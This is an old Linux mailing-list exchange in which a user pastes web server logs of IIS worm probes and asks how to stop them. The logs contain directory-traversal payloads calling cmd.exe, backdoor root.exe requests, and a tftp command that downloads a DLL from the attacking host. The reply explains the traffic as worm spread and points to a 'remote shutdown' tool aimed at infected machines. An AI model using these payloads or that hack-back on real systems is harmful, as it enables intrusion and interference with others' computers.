Ibly Piblo wrote: >I am getting strange hits to my web server, >I don't like it and I wish to know how >to stop them from slipping past my defenses. > >I try using ipchains, most addresses are >blocked, but for reasons I can't figure out, >this address 65.192.23.150 keeps showing up. > >I don't understand it, if ipchains, >/etc/hosts.deny can't block it, what can? > >Do I send back a command to shut down >their server? > >How do I get the point accross? > >65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 342 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 358 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 400 308 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 400 308 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 325 "-" "-" >65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 325 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET >/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET >/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll >HTTP/1.0" 200 87 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET >/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET >/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET >/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll >HTTP/1.0" 200 87 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET >/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" >"-" >65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" >"-" >65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 325 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 342 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 342 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 358 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 324 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 400 308 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 400 308 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 325 "-" "-" >65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 325 "-" " >
That is no DoS attack--tis the wailing of IIS infected trying to spread its misery. Go here... Tis time to meet a friend. http://pfortin.com/Linux/MSVTS/ And yes the remote shutdown is there. While you are at it, you might want to make some more new friends http://plf.zarb.org Civileme >
Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com